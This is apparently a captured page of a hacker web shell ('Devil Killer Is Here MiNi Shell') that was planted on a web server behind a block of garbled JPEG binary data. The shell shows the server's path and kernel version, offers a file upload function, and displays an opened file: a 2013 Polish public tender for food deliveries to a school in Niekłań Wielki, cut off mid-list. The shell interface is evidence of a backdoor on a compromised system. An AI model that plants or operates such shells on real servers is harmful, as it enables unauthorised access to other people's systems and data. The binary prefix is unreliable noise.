JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130104/6160-N-2013.html

<p class="kh_header"><b>Stąporków: Sukcesywna  dostawa i zakup artykułów żywnościowych  
dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim  część III</b><br>
<b>Numer ogłoszenia: 6160 - 2013; data zamieszczenia: 04.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Publicznych w Niekłaniu Wielkim , ul.Szkolna 4, 26-220 Stąporków, woj. świętokrzyskie, tel. 41 374 40 14, faks 41 374 40 14.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.staporkow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna  dostawa i zakup artykułów żywnościowych  
dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim  część III.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia  jest sukcesywna dostawa i zakup  artykułów żywnościowych dla Zespołu Szkół Publicznych  z siedzibą w Niekłaniu Wielkim Część A Pieczywo i wyroby cukiernicze   BUŁKA KAJZERKA PSZENNA szt. 600, BUŁKA TARTA, opakowanie 500 g szt . 60 BUŁKA CZERSTWA szt 130, BUŁKA SŁODKA różne rodzaje, świeże szt. 150, CHLEB, bez konserwantów i polepszaczy, 600 g szt.1600, 

Część B  Ryby i mrożonki  FILET Z PANGI bez skóry, mrożony płaty kg 200, MROŻONKA BROKUŁY (różyczki) kg  20, MROŻONKA FASOLKA SZPARAGOWA ZIELONA cięta, oczyszczona, opakowanie  500 g opakowań 80,  MROŻONKA KALAFIOR (różyczki), opakowanie 500g opakowań 100, MROŻONKA MIESZANKA WARZYWNA, opakowanie 500 g opakowań 150.

Część C Warzywa i owoce świeże  BANANY kg 35, BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia kg 200, CEBULA BIAŁA (bez szczypioru), wielkość średnia kg 120, CYTRYNA (średnia wielkość) kg 40, CZOSNEK ŚWIEŻY (min. 80g), krajowy szt 20, GROCH ŁUSKANY, opakowanie paczka 500 g opak. 280, GRUSZKI kg 100, JABŁKA kg 300, JAJA KONSUMPCYJNE KURZE, świeże szt 1500, KALAFIOR (min. 800g) szt.50, KAPUSTA BIAŁA kg 100, KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5 000g szt 50, KAPUSTA PEKIŃSKA (foliowana) kg 35, MARCHEW KAROTKA, wielkość średnia, bez naci kg 500, KOPER I NATKA PIETRUSZKI, pęczki pęczek 600, OGÓREK GRUNTOWY ŚWIEŻY (krajowy) kg 100, OGÓREK KISZONY w naturalnym kwasie z koprem i solą, opakowanie wiaderko plastikowe  3 000 g szt 50,  PAPRYKA ŚWIEŻA kg 30, PIECZARKI ŚWIEŻE kg 55, PIETRUSZKA kg 165, POMARAŃCZE kg 100, POMIDORY kg 50, POR szt 200, RZODKIEWKA, pęczki pęczek 50, SAŁATA ŚWIEŻA szt 10, SELER KORZENIOWY kg 100, ZIEMNIAKI kg 4 500, 

Część D Mięso i wędliny BOCZEK PARZONY WĘDZONY kg 40, KIEŁBASA TYPU WIEJSKA kg 200, UDZIEC Z INDYKA kg 20, SKRZYDŁO Z INDYKA kg 10, MIĘSO WIEPRZOWE BEZ KOŚCI kg 60, PARÓWKI ŚLĄSKIE wieprzowe, odtłuszczone kg 20, UDZIEC Z KURCZAKA kg 40, KOŚCI WIEPRZOWE kg 120, SMALEC WIEPRZOWY, opakowanie kostka 250 g szt 20, SŁONINA, surowa, bez dodatków,  bez skóry kg 70, WIEPRZOWINA - SCHAB Z KOŚCIĄ kg 50, MIĘSO MIELONE WOŁOWO - WIEPRZOWE kg 140, UDKA DROBIOWE kg 350, FILET Z KURCZAKA kg 50, MIĘSO WOŁOWE BEZ KOŚCI kg 30, PASZTET MAZOWIECKI opakowanie słoik 450 g szt 40, GOLONKA Z INDYKA kg 15, ŻEBERKA WIEPRZOWE kg 30, WĘDLINA - SZYNKA GOTOWANA WIEPRZOWA, mięso wieprzowe min. 67% kg 5, PORCJE ROSOŁOWE DROBIOWE kg 200, 

Część  E Produkty ogólnospożywcze ANANAS, opakowanie puszka 340g netto szt. 150, BARSZCZ BIAŁY TYPU WINIARY, opakowanie torebka 66 g, szt.140, BRZOSKWINIE, opakowanie puszka 480g netto szt. 150, CHRZAN TARTY, opakowanie słoik 200 g, szt. 40, CUKIER BIAŁY, drobny kryształ, opakowanie 1000g kg 130, CZEKOLADA MLECZNA TWARDA, opakowanie 100g szt. 600, FASOLA TYPU JAŚ, opakowanie 500 g szt. 30, GROSZEK KONSERWOWY opakowanie puszka 400 g  szt.30, HERBATA W GRANULKACH CZARNA 100%, TYPU ETERNAL, opakowanie 100 g szt. 70, KASZA JĘCZMIENNA pęczak, opakowanie 1000g szt 40, KONCENTRAT POMIDOROWY TYPU PUDLISZKI opakowanie słoik  200 g, pasteryzowany szt. 250, LIŚĆ LAUROWY opakowanie 6 g szt. 100, MAJERANEK SUSZONY opakowanie 8 g szt.250, MAKARON NITKI TYPU LUBELLA NR 49, opakowanie 500 g szt. 100, MAKARON ŚWIDERKI TYPU LUBELLA NR 19, opakowanie 500 g szt. 400, MAKARON ZACIERKA, opakowanie 250g,  jajeczny szt. 40, MĄKA PSZENNA TORTOWA, opakowanie papierowe 1000g kg 80, MĄKA ŻYTNIA DO ZACZYNU, opakowanie 1000g kg 60, OLEJ TYPU KUJAWSKI z pierwszego tłoczenia, opakowanie butelka 1 litr litr 90, OREGANO SUSZONE, opakowanie 8g szt. 14, PAPRYKA MIELONA SŁODKA, opakowanie 20g szt. 14 PIEPRZ CZARNY MIELONY, opakowanie 20g szt. 240, PRZYPRAWA DO MIĘS, opakowanie torebka  20g szt 10, PRZYPRAWA DO  SOSÓW, opakowanie torebka  20g szt. 10, PRZYPRAWA DO RYB, opakowanie 20g szt. 10, PRZYPRAWA TYPU VEGETA, opakowanie  200g, zawierająca min. 15% suszonych warzyw takich jak marchew, cebula, ziemniaki, pasternak, seler, natka pietruszki szt. 130, PRZYPRAWA DO ZUP TYPU MAGGI opakowanie butelka 210g  szt 5, ROSOŁKI DROBIOWE TYPU WINIARY, opakowanie 120 g szt 150, RYŻ BIAŁY DŁUGOZIARNISTY SYPKI, opakowanie torba papierowa 1000g kg 50, SOK TYPU KUBUŚ, różne smaki, opakowani butelka 400 ml szt. 300, SOS PIECZENIOWY TYPU KNORR, opakowanie 1000g szt. 3, SOS DO SPAGHETTI BOLOGNESE TYPU KNORR,  w proszku, opakowanie 1 000g szt.6, 
SÓL JODOWANA opakowanie 1000g kg 110, ZIELE ANGIELSKIE, opakowanie torebka 8g szt 100, JOGURT, różne smaki, opakowanie kubek 150 g szt 1500, ŚMIETANA TYPU KONECKA 24%, opakowanie kubek 250 g szt 1100, MASŁO EXTRA, opakowanie 200g szt. 20, SER ŻÓŁTY GOUDA, pakowany w plastrach na tackach 250g szt 60, TWARÓG W KOSTCE, opakowanie 250g szt 50.

Część   F Woreczki i torebki foliowe  WORECZKI ŚNIADANIOWE, opakowanie 1000 sztuk opakowań 2 ZRYWKI FOLIOWE, opakowanie 100 sztuk opakowań 5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.81.10.00-6, 15.84.23.00-5, 15.22.00.00-6, 15.33.11.70-9, 15.30.00.00-1, 15.10.00.00-9, 15.80.00.00-6, 15.50.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia /niespełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia /niespełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>spełnia /niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Umowa zostanie zawarta na warunkach określonych w Załączniku nr 5 do siwz.
Zamawiającemu przysługuje prawo do zmiany postanowień umowy zawartej w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w sytuacji o której mowa w załączniku nr 5 -  wzoru umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.staporkow.pl i www.zspnieklan.szkolnastrona.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego Zespół Szkół Publicznych Publiczna Szkoła Podstawowa w Niekłaniu Wielkim ul. Szkolna 4, Niekłań Wielki 26 -220 Stąporków..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.01.2013 godzina 10:00, miejsce: Sekretariat siedziby  zamawiającego Zespół Szkół Publicznych Publiczna Szkoła Podstawowa w Niekłaniu Wielkim ul. Szkolna 4, Niekłań Wielki 26 -220 Stąporków..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III 

 Część A  Pieczywo i wyroby cukiernicze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części A jest BUŁKA KAJZERKA PSZENNA szt. 600, BUŁKA TARTA, opakowanie 500 g szt . 60 BUŁKA CZERSTWA szt 130, BUŁKA SŁODKA różne rodzaje, świeże szt. 150, CHLEB, bez konserwantów i polepszaczy, 600 g szt.1600,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.84.11.00-6, 15.84.23.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III 

 Część B Ryby i mrożonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części B jest zakup i dostawa  FILET Z PANGI bez skóry, mrożony płaty kg 200, MROŻONKA BROKUŁY (różyczki) kg  20, MROŻONKA FASOLKA SZPARAGOWA ZIELONA cięta, oczyszczona, opakowanie  500 g opakowań 80,  MROŻONKA KALAFIOR (różyczki), opakowanie 500g opakowań 100, MROŻONKA MIESZANKA WARZYWNA, opakowanie 500 g opakowań 150..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.22.00.00-6, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III 

 Część C Warzywa i owoce świeże..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamowienia jest zakup i dostawa świeże  BANANY kg 35, BURAKI CZERWONE, konsumpcyjne, bez liści, wielkość średnia kg 200, CEBULA BIAŁA (bez szczypioru), wielkość średnia kg 120, CYTRYNA (średnia wielkość) kg 40, CZOSNEK ŚWIEŻY (min. 80g), krajowy szt 20, GROCH ŁUSKANY, opakowanie paczka 500 g opak. 280, GRUSZKI kg 100, JABŁKA kg 300, JAJA KONSUMPCYJNE KURZE, świeże szt 1500, KALAFIOR (min. 800g) szt.50, KAPUSTA BIAŁA kg 100, KAPUSTA KISZONA BIAŁA, nie przekwaszona, opakowanie wiaderko plastikowe 5 000g szt 50, KAPUSTA PEKIŃSKA (foliowana) kg 35, MARCHEW KAROTKA, wielkość średnia, bez naci kg 500, KOPER I NATKA PIETRUSZKI, pęczki pęczek 600, OGÓREK GRUNTOWY ŚWIEŻY (krajowy) kg 100, OGÓREK KISZONY w naturalnym kwasie z koprem i solą, opakowanie wiaderko plastikowe  3 000 g szt 50,  PAPRYKA ŚWIEŻA kg 30, PIECZARKI ŚWIEŻE kg 55, PIETRUSZKA kg 165, POMARAŃCZE kg 100, POMIDORY kg 50, POR szt 200, RZODKIEWKA, pęczki pęczek 50, SAŁATA ŚWIEŻA szt 10, SELER KORZENIOWY kg 100, ZIEMNIAKI kg 4 500,.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.30.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 30.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III 

 Część D Mięso i wędliny..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części D jest dostawa i zakup Mięso i wędliny BOCZEK PARZONY WĘDZONY kg 40, KIEŁBASA TYPU WIEJSKA kg 200, UDZIEC Z INDYKA kg 20, SKRZYDŁO Z INDYKA kg 10, MIĘSO WIEPRZOWE BEZ KOŚCI kg 60, PARÓWKI ŚLĄSKIE wieprzowe, odtłuszczone kg 20, UDZIEC Z KURCZAKA kg 40, KOŚCI WIEPRZOWE kg 120, SMALEC WIEPRZOWY, opakowanie kostka 250 g szt 20, SŁONINA, surowa, bez dodatków,  bez skóry kg 70, WIEPRZOWINA - SCHAB Z KOŚCIĄ kg 50, MIĘSO MIELONE WOŁOWO - WIEPRZOWE kg 140, UDKA DROBIOWE kg 350, FILET Z KURCZAKA kg 50, MIĘSO WOŁOWE BEZ KOŚCI kg 30, PASZTET MAZOWIECKI opakowanie słoik 450 g szt 40, GOLONKA Z INDYKA kg 15, ŻEBERKA WIEPRZOWE kg 30, WĘDLINA - SZYNKA GOTOWANA WIEPRZOWA, mięso wieprzowe min. 67% kg 5, PORCJE ROSOŁOWE DROBIOWE kg 200..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Sukcesywna   dostawa i zakup   artykułów żywnościowych dla Zespołu Szkól Publicznych   w Niekłaniu Wielkim . Część III 

 Część E Produkty ogólnospożywcze ..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia części E są produkty ogólnospożywcze ANANAS, opakowanie puszka 340g netto szt. 150, BARSZCZ BIAŁY TYPU WINIARY, opakowanie torebka 66 g, szt.140, BRZOSKWINIE, opakowanie puszka 480g netto szt. 150, CHRZAN TARTY, opakowanie słoik 200 g, szt. 40, CUKIER BIAŁY, drobny kryształ, opakowanie 1000g kg 130, CZEKOLADA MLECZNA TWARDA, opakowanie 100g szt. 600, FASOLA TYPU JAŚ, opakowanie 500 g szt. 30, GROSZEK KONSERWOWY opakowanie puszka 400 g  szt.30, HERBATA W GRANULKACH CZARNA 100%, TYPU ETERNAL, opakowanie 100 g szt. 70, KASZA JĘCZMIENNA pęczak, opakowanie 1000g szt 40, KONCENTRAT POMIDOROWY TYPU PUDLISZKI opakowanie słoik  200 g, pasteryzowany szt. 250, LIŚĆ LAUROWY opakowanie 6 g szt. 100, MAJERANEK SUSZONY opakowanie 8 g szt.250, MAKARON NITKI TYPU LUBELLA NR 49, opakowanie 500 g szt. 100, MAKARON ŚWIDERKI TYPU LUBELLA NR 19, opakowanie 500 g szt. 400, MAKARON ZACIERKA, opakowanie 250g,  jajeczny szt. 40, MĄKA PSZENNA TORTOWA, opakowanie papierowe 1000g kg 80, MĄKA ŻYTNIA DO ZACZYNU, opakowanie 1000g kg 60, OLEJ TYPU KUJAWSKI z pierwszego tłoczenia, opakowanie 